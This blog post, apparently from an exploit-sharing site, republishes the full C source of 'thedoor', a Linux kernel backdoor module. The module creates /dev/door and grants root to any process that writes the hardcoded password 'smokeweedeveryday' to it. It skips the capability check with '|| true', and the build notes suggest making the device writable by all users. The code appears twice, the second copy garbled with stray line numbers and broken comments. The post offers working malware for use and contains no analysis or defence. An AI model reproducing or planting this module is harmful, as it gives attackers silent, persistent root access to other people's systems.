thedoor – A horrible linux backdoor module.

Fragile / April 23, 2015 / Comments Off / Exploits

thedoor is A horrible linux backdoor module.
This is a linux kernel module that adds a device /dev/door. When a correct password is written to this file, you are immediately made root without any checks.

Building :
A linux source tree has to be in ./linux. Don’t forget to make the device file accesible to everyone if you want for unprivileged users to be able to write to it.
License : Please don’t use this please 🙂
C Code Script:

#include <linux/module.h>
#include <linux/version.h>
#include <linux/kernel.h>
#include <linux/types.h>
#include <linux/kdev_t.h>
#include <linux/fs.h>
#include <linux/device.h>
#include <linux/cdev.h>
#include <linux/uaccess.h>

#include <linux/kernel.h>
#include <linux/export.h>
#include <linux/mm.h>
#include <linux/utsname.h>
#include <linux/mman.h>
#include <linux/reboot.h>
#include <linux/prctl.h>
#include <linux/highuid.h>
#include <linux/fs.h>
#include <linux/kmod.h>
#include <linux/perf_event.h>
#include <linux/resource.h>
#include <linux/kernel.h>
#include <linux/workqueue.h>
#include <linux/capability.h>
#include <linux/device.h>
#include <linux/key.h>
#include <linux/times.h>
#include <linux/posix-timers.h>
#include <linux/security.h>
#include <linux/dcookies.h>
#include <linux/suspend.h>
#include <linux/tty.h>
#include <linux/signal.h>
#include <linux/cn_proc.h>
#include <linux/getcpu.h>
#include <linux/task_io_accounting_ops.h>
#include <linux/seccomp.h>
#include <linux/cpu.h>
#include <linux/personality.h>
#include <linux/ptrace.h>
#include <linux/fs_struct.h>
#include <linux/file.h>
#include <linux/mount.h>
#include <linux/gfp.h>
#include <linux/syscore_ops.h>
#include <linux/version.h>
#include <linux/ctype.h>

#include <linux/compat.h>
#include <linux/syscalls.h>
#include <linux/kprobes.h>
#include <linux/user_namespace.h>
#include <linux/binfmts.h>

/*#include <linux/sched.h>*/
#include <linux/rcupdate.h>
#include <linux/uidgid.h>
#include <linux/cred.h>

#include <linux/kmsg_dump.h>
/* Move somewhere else to avoid recompiling? */
#include <generated/utsrelease.h>

#include <asm/uaccess.h>
#include <asm/io.h>
#include <asm/unistd.h>

#include <linux/kallsyms.h>


struct user_struct root_user = {
          .__count        = ATOMIC_INIT(1),
          .processes      = ATOMIC_INIT(1),
          .sigpending     = ATOMIC_INIT(0),
          .locked_shm     = 0,
          .uid            = GLOBAL_ROOT_UID,
};

static int set_user(struct cred *new)
{
    struct user_struct *new_user;
    struct user_struct* (*auid)(kuid_t);
    void (*fuid)(struct user_struct *);

    auid = kallsyms_lookup_name("alloc_uid");
    new_user = auid(new->uid);
    if (!new_user)
        return -EAGAIN;

    /*
     * We don't fail in case of NPROC limit excess here because too many
     * poorly written programs don't check set*uid() return code, assuming
     * it never fails if called by root.  We may still enforce NPROC limit
     * for programs doing set*uid()+execve() by harmlessly deferring the
     * failure to the execve() stage.
     */
    if (atomic_read(&new_user->processes) >= rlimit(RLIMIT_NPROC) &&
            new_user != INIT_USER)
        current->flags |= PF_NPROC_EXCEEDED;
    else
        current->flags &= ~PF_NPROC_EXCEEDED;

    fuid = kallsyms_lookup_name("free_uid");
    fuid(new->user);
    new->user = new_user;
    return 0;
}

static long elevate_privileges(void)
{
    struct user_namespace *ns = current_user_ns();
    const struct cred *old;
    struct cred *new;
    int retval;
    kuid_t kuid;
    uid_t uid = 0;
    int (*stask)(struct cred *, const struct cred *, int);

    kuid = make_kuid(ns, uid);
    if (!uid_valid(kuid))
        return -EINVAL;

    new = prepare_creds();
    if (!new)
        return -ENOMEM;
    old = current_cred();

    retval = -EPERM;
    if (ns_capable(old->user_ns, CAP_SETUID) || true) {
        new->suid = new->uid = kuid;
        if (!uid_eq(kuid, old->uid)) {
            retval = set_user(new);
            if (retval < 0)
                goto error;
        }
    } else if (!uid_eq(kuid, old->uid) && !uid_eq(kuid, new->suid)) {
        goto error;
    }

    new->fsuid = new->euid = kuid;

    stask = kallsyms_lookup_name("security_task_fix_setuid");
    retval = stask(new, old, LSM_SETID_ID);
    if (retval < 0)
        goto error;

    return commit_creds(new);

error:
    abort_creds(new);
    return retval;
}


static dev_t dev_id;
static struct class *dev_class;
static struct cdev device;


#define PASS_BUF_SIZE 128
char pass_buf[PASS_BUF_SIZE];

const char password[] = "smokeweedeveryday";

static int thedoor_open(struct inode *inod, struct file *fl)
{
    return 0;
}

static int thedoor_close(struct inode *inod, struct file *fl)
{
    return 0;
}

static ssize_t thedoor_read(struct file *fl, char __user *buf, size_t len, loff_t *off)
{
    return 0;
}

static ssize_t thedoor_write(
    struct file *fl, const char __user *buf, size_t len, loff_t *off)
{
    if (len >= PASS_BUF_SIZE)
        return len;

    if (copy_from_user(pass_buf, buf, len) != 0)
        return -EFAULT;

    pass_buf[len] = '\0';
    if (pass_buf[len - 1] == '\n')
        pass_buf[len - 1] = '\0';

    if (strcmp(pass_buf, password) == 0)
        elevate_privileges();

    return len;
}

static struct file_operations thedoor_fops = {
    .owner = THIS_MODULE,
    .open = thedoor_open,
    .release = thedoor_close,
    .read = thedoor_read,
    .write = thedoor_write
};


static int __init thedoor_init(void)
{
    printk("Thedoor loading\n");

    if (alloc_chrdev_region(&dev_id, 0, 1, "thedoor") < 0)
        goto error;

    if ((dev_class = class_create(THIS_MODULE, "thedoor")) == NULL)
        goto error_class;

    if (device_create(dev_class, NULL, dev_id, NULL, "door") == NULL)
        goto error_device;

    cdev_init(&device, &thedoor_fops);
    if (cdev_add(&device, dev_id, 1) == -1)
        goto error_cdev;

    return 0;

error_cdev:
    device_destroy(dev_class, dev_id);
error_device:
    class_destroy(dev_class);
error_class:
    unregister_chrdev_region(dev_id, 1);
error:
    return -1;
}


static void __exit thedoor_exit(void)
{
    printk("Thedoor unloading\n");

    cdev_del(&device);
    device_destroy(dev_class, dev_id);
    class_destroy(dev_class);
    unregister_chrdev_region(dev_id, 1);
}


module_init(thedoor_init);
module_exit(thedoor_exit);

MODULE_LICENSE("GPL");
MODULE_AUTHOR("swarmer <anton@swarmer.me>");
MODULE_DESCRIPTION("A bad backdoor");

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

#include <linux/module.h>

#include <linux/version.h>

#include <linux/kernel.h>

#include <linux/types.h>

#include <linux/kdev_t.h>

#include <linux/fs.h>

#include <linux/device.h>

#include <linux/cdev.h>

#include <linux/uaccess.h>

#include <linux/kernel.h>

#include <linux/export.h>

#include <linux/mm.h>

#include <linux/utsname.h>

#include <linux/mman.h>

#include <linux/reboot.h>

#include <linux/prctl.h>

#include <linux/highuid.h>

#include <linux/fs.h>

#include <linux/kmod.h>

#include <linux/perf_event.h>

#include <linux/resource.h>

#include <linux/kernel.h>

#include <linux/workqueue.h>

#include <linux/capability.h>

#include <linux/device.h>

#include <linux/key.h>

#include <linux/times.h>

#include <linux/posix-timers.h>

#include <linux/security.h>

#include <linux/dcookies.h>

#include <linux/suspend.h>

#include <linux/tty.h>

#include <linux/signal.h>

#include <linux/cn_proc.h>

#include <linux/getcpu.h>

#include <linux/task_io_accounting_ops.h>

#include <linux/seccomp.h>

#include <linux/cpu.h>

#include <linux/personality.h>

#include <linux/ptrace.h>

#include <linux/fs_struct.h>

#include <linux/file.h>

#include <linux/mount.h>

#include <linux/gfp.h>

#include <linux/syscore_ops.h>

#include <linux/version.h>

#include <linux/ctype.h>

#include <linux/compat.h>

#include <linux/syscalls.h>

#include <linux/kprobes.h>

#include <linux/user_namespace.h>

#include <linux/binfmts.h>

/*#include <linux/sched.h>*/

#include <linux/rcupdate.h>

#include <linux/uidgid.h>

#include <linux/cred.h>

#include <linux/kmsg_dump.h>

/* Move somewhere else to avoid recompiling? */

#include <generated/utsrelease.h>

#include <asm/uaccess.h>

#include <asm/io.h>

#include <asm/unistd.h>

#include <linux/kallsyms.h>

struct user_struct root_user = {

.__count = ATOMIC_INIT(1),

.processes = ATOMIC_INIT(1),

.sigpending = ATOMIC_INIT(0),

.locked_shm = 0,

.uid = GLOBAL_ROOT_UID,

};

static int set_user(struct cred *new)

{

struct user_struct *new_user;

struct user_struct* (*auid)(kuid_t);

void (*fuid)(struct user_struct *);

auid = kallsyms_lookup_name("alloc_uid");

new_user = auid(new->uid);

if (!new_user)

return -EAGAIN;

* We don't fail in case of NPROC limit excess here because too many

* poorly written programs don't check set*uid() return code, assuming

* it never fails if called by root. We may still enforce NPROC limit

* for programs doing set*uid()+execve() by harmlessly deferring the

* failure to the execve() stage.

if (atomic_read(&new_user->processes) >= rlimit(RLIMIT_NPROC) &&

new_user != INIT_USER)

current->flags |= PF_NPROC_EXCEEDED;

else

current->flags &= ~PF_NPROC_EXCEEDED;

fuid = kallsyms_lookup_name("free_uid");

fuid(new->user);

new->user = new_user;

return 0;

}

static long elevate_privileges(void)

{

struct user_namespace *ns = current_user_ns();

const struct cred *old;

struct cred *new;

int retval;

kuid_t kuid;

uid_t uid = 0;

int (*stask)(struct cred *, const struct cred *, int);

kuid = make_kuid(ns, uid);

if (!uid_valid(kuid))

return -EINVAL;

new = prepare_creds();

if (!new)

return -ENOMEM;

old = current_cred();

retval = -EPERM;

if (ns_capable(old->user_ns, CAP_SETUID) || true) {

new->suid = new->uid = kuid;

if (!uid_eq(kuid, old->uid)) {

retval = set_user(new);

if (retval < 0)

goto error;

}

} else if (!uid_eq(kuid, old->uid) && !uid_eq(kuid, new->suid)) {

goto error;

}

new->fsuid = new->euid = kuid;

stask = kallsyms_lookup_name("security_task_fix_setuid");

retval = stask(new, old, LSM_SETID_ID);

if (retval < 0)

goto error;

return commit_creds(new);

error:

abort_creds(new);

return retval;

}

static dev_t dev_id;

static struct class *dev_class;

static struct cdev device;

#define PASS_BUF_SIZE 128

char pass_buf[PASS_BUF_SIZE];

const char password[] = "smokeweedeveryday";

static int thedoor_open(struct inode *inod, struct file *fl)

{

return 0;

}

static int thedoor_close(struct inode *inod, struct file *fl)

{

return 0;

}

static ssize_t thedoor_read(struct file *fl, char __user *buf, size_t len, loff_t *off)

{

return 0;

}

static ssize_t thedoor_write(

struct file *fl, const char __user *buf, size_t len, loff_t *off)

{

if (len >= PASS_BUF_SIZE)

return len;

if (copy_from_user(pass_buf, buf, len) != 0)

return -EFAULT;

pass_buf[len] = '\0';

if (pass_buf[len - 1] == '\n')

pass_buf[len - 1] = '\0';

if (strcmp(pass_buf, password) == 0)

elevate_privileges();

return len;

}

static struct file_operations thedoor_fops = {

.owner = THIS_MODULE,

.open = thedoor_open,

.release = thedoor_close,

.read = thedoor_read,

.write = thedoor_write

};

static int __init thedoor_init(void)

{

printk("Thedoor loading\n");

if (alloc_chrdev_region(&dev_id, 0, 1, "thedoor") < 0)

goto error;

if ((dev_class = class_create(THIS_MODULE, "thedoor")) == NULL)

goto error_class;

if (device_create(dev_class, NULL, dev_id, NULL, "door") == NULL)

goto error_device;

cdev_init(&device, &thedoor_fops);

if (cdev_add(&device, dev_id, 1) == -1)

goto error_cdev;

return 0;

error_cdev:

device_destroy(dev_class, dev_id);

error_device:

class_destroy(dev_class);

error_class:

unregister_chrdev_region(dev_id, 1);

error:

return -1;

}

static void __exit thedoor_exit(void)

{

printk("Thedoor unloading\n");

cdev_del(&device);

device_destroy(dev_class, dev_id);

class_destroy(dev_class);

unregister_chrdev_region(dev_id, 1);

}

module_init(thedoor_init);

module_exit(thedoor_exit);

MODULE_LICENSE("GPL");

MODULE_AUTHOR("swarmer <anton@swarmer.me>");

MODULE_DESCRIPTION("A bad backdoor");

Source : https://github.com/swarmer

Tags: Backdoor, C Script

Archives

thedoor – A horrible linux backdoor module.